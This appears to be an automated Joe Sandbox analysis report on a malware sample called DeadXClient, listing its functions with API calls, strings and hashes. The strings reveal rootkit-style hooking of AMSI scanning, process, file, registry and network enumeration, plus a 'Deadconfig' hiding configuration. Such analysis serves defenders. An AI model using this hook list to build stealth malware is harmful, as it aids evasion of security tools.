                                                                                                                                                                                  • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB313236214F80D6E720CF65E8407DE73A5F788B58F500216EA9D47B68DF78C159CB10
                                                                                                                                                                                  Function 1C5A0018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1443284424-0
                                                                                                                                                                                  • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                                                                                                                                                  • Instruction ID: 58e91b258544dea7587822cdff1f9966fd99d676f2097aeb169e4ecd538b64b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6ED1FD72B24B908AE700CF66D4802DE7BB1F385BD8F108616DE9E57B58EA38C45BC710
                                                                                                                                                                                  Function 1C591628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C591633
                                                                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C591642
                                                                                                                                                                                    • Part of subcall function 1C591268: GetProcessHeap.KERNEL32 ref: 1C59126E
                                                                                                                                                                                    • Part of subcall function 1C591268: HeapAlloc.KERNEL32 ref: 1C59127D
                                                                                                                                                                                    • Part of subcall function 1C591268: GetProcessHeap.KERNEL32 ref: 1C591297
                                                                                                                                                                                    • Part of subcall function 1C591268: HeapAlloc.KERNEL32 ref: 1C5912A8
                                                                                                                                                                                    • Part of subcall function 1C591000: GetProcessHeap.KERNEL32 ref: 1C591006
                                                                                                                                                                                    • Part of subcall function 1C591000: HeapAlloc.KERNEL32 ref: 1C591015
                                                                                                                                                                                    • Part of subcall function 1C591000: GetProcessHeap.KERNEL32 ref: 1C591028
                                                                                                                                                                                    • Part of subcall function 1C591000: HeapAlloc.KERNEL32 ref: 1C591037
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5916B2
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5916DF
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5916F9
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591719
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591734
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591754
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C59176F
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C59178F
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5917AA
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C5917CA
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5917E5
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591805
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591820
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C591840
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C59185B
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32 ref: 1C59187B
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C591896
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 1C5918A0
                                                                                                                                                                                    • Part of subcall function 1C5912BC: RegQueryInfoKeyW.ADVAPI32 ref: 1C591319
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C591327
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C591338
                                                                                                                                                                                    • Part of subcall function 1C5912BC: RegEnumValueW.ADVAPI32 ref: 1C591397
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C5913DF
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C5913ED
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C59140A
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapFree.KERNEL32 ref: 1C591418
                                                                                                                                                                                    • Part of subcall function 1C5912BC: lstrlenW.KERNEL32 ref: 1C591421
                                                                                                                                                                                    • Part of subcall function 1C5912BC: GetProcessHeap.KERNEL32 ref: 1C59142F
                                                                                                                                                                                    • Part of subcall function 1C5912BC: HeapAlloc.KERNEL32 ref: 1C59143D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                  • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                  • API String ID: 2135414181-3864762265
                                                                                                                                                                                  • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                                                                                                                                                  • Instruction ID: 0f415d126fe9b085e8abf1462f11578430e9dc9b7cc287b780d62b5f9fdbc58a
                                                                                                                                                                                  • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C710836310E5186EB109F67E890B9A77B5FB89B8CF001255DE4E47B28EF38D489C754
                                                                                                                                                                                  Function 1C591D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 1C591D47
                                                                                                                                                                                    • Part of subcall function 1C5920C0: GetModuleHandleA.KERNEL32(?,?,?,1C591D79), ref: 1C5920D8
                                                                                                                                                                                    • Part of subcall function 1C5920C0: GetProcAddress.KERNEL32(?,?,?,1C591D79), ref: 1C5920E9
                                                                                                                                                                                    • Part of subcall function 1C595F50: GetCurrentThreadId.KERNEL32 ref: 1C595F8B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                                                                                                                                  • API String ID: 4175298099-4225371247
                                                                                                                                                                                  • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                                                                                                                                                  • Instruction ID: 2154b66a51e30b8403c65830274ffad121594635ea21741c557547cb998d3576
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A4192B4291E4AE0FB00DB66ED62FE82367A794388FC05653840D03534EE78E6DEC765
                                                                                                                                                                                  Function 1C5912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                  • API String ID: 2005889112-2564639436
                                                                                                                                                                                  • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                                                                                                                                                  • Instruction ID: 97d1668f96ff08cf67e22d00a62a2b08aa36a34528dbea6ba1978c14a024161d
                                                                                                                                                                                  • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                                                                                                                                                  • Instruction Fuzzy Hash: 63513C72614B8486E714CFA3E44879AB7A2F788FD8F448224DE4A47719DF7CD099CB00
                                                                                                                                                                                  Function 1C5930B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C59310E
                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C59311F
                                                                                                                                                                                  • HeapAlloc.KERNEL32 ref: 1C59312D
                                                                                                                                                                                  • PdhGetCounterInfoW.PDH ref: 1C593143
                                                                                                                                                                                  • StrCmpW.SHLWAPI ref: 1C593158
                                                                                                                                                                                    • Part of subcall function 1C593558: StrCmpNW.SHLWAPI ref: 1C59357A
                                                                                                                                                                                    • Part of subcall function 1C593558: StrStrW.SHLWAPI ref: 1C593594
                                                                                                                                                                                    • Part of subcall function 1C593558: StrToIntW.SHLWAPI ref: 1C5935BB
                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 1C593185
                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 1C593193
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • \GPU user(*)\Utilization Percentage, xrefs: 1C593151
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                                                                                                                                  • String ID: \GPU user(*)\Utilization Percentage
                                                                                                                                                                                  • API String ID: 1943346504-3507739905
                                                                                                                                                                                  • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                                                                                                                                                  • Instruction ID: d0f1677d326b8279d5c1e18189aca55de7941c32035acafe44dfba627170b15d
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F215CB2650F41D6F700DF67A848B9AA3B2F784F89F045225DE4A43726EF38D456C700
                                                                                                                                                                                  Function 1C592C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleModuleProclstrlen
                                                                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                  • API String ID: 3607816002-3850299575
                                                                                                                                                                                  • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                                                                                                                                                  • Instruction ID: 14ef287bfacf46629011a5427d1fffc655e797ff9b8a7584eb3c0d8bdd016a75
                                                                                                                                                                                  • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF91F236202B91C6EB08CF26D8407AD7366F784FD8F5051A6DE4957B28EF38D985C790
                                                                                                                                                                                  Function 1C59104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                  • API String ID: 3743429067-2564639436
                                                                                                                                                                                  • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                                                                                                                                                  • Instruction ID: 23cc643ce3d4626f6d1dad7ef7d9d5cc33ee5eeb800a046394c740e9d99b1b0c
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9416B33614BC0D6E710CF62E44479EB7B2F389B98F448229DA8947B18DF38D589CB40
                                                                                                                                                                                  Function 1C597930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 1C597958
                                                                                                                                                                                  • __scrt_acquire_startup_lock.LIBCMT ref: 1C5979AA
                                                                                                                                                                                  • _RTC_Initialize.LIBCMT ref: 1C5979D8
                                                                                                                                                                                  • __scrt_dllmain_after_initialize_c.LIBCMT ref: 1C5979FE
                                                                                                                                                                                  • __scrt_release_startup_lock.LIBCMT ref: 1C597A29
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 190073905-0
                                                                                                                                                                                  • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                                                                                                                                                  • Instruction ID: e11066abae5816fde43052a2487a9d0a600ae20b54272ffeeaeedf372e9d501f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E710235704742C6FB009B769840789A7A2FBC6BC0F5446A7CA0987725EF78E98AC724
                                                                                                                                                                                  Function 1C599930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999B5
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999C3
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C5999ED
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C599A33
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,1C599AEF,?,?,?,1C5998B4,?,?,?,?,1C5994A5), ref: 1C599A3F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                  • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                                                                                                                                                  • Instruction ID: ad41b33d2cff7823a7cc60bb4f893933781ad136e9dea914405270e99ba85495
                                                                                                                                                                                  • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A31B531313BC2D1EF05AB47A800B9AA3A8F748BA4F5A0A65DD2D0B750EF38D085C350
                                                                                                                                                                                  Function 1C5A1CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                  • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                                                                                                                                                  • Instruction ID: bafa810a638c472e6294e201ea1659b20b748359e5c3750c6a262662ac4433d6
                                                                                                                                                                                  • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                                                                                                                                                  • Instruction Fuzzy Hash: AA116A31320F8086F7108B53E848B5AB6A1F788FE8F004325EA5E877A4DF78D484C744
                                                                                                                                                                                  Function 1C5931C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                                                                  • String ID: Dead
                                                                                                                                                                                  • API String ID: 756756679-1293411866
                                                                                                                                                                                  • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                                                                                                                                                  • Instruction ID: 8d5d3840d2ee0794494d523c6ac463ac605abc53125fa820678c6a09babfc924
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31BC32702B51C3EB05DF96E8447AAA761FB54F84F149264DF8907B26EF38E0A68710
                                                                                                                                                                                  Function 1C591934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.3503593133.000000001C591000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C590000, based on PE: true
                                                                                                                                                                                  • Associated: 00000006.00000002.3503421421.000000001C590000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3503957974.000000001C5A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504194441.000000001C5AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504350241.000000001C5AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000006.00000002.3504590015.000000001C5B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_1c590000_DeadXClient.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                  • String ID:
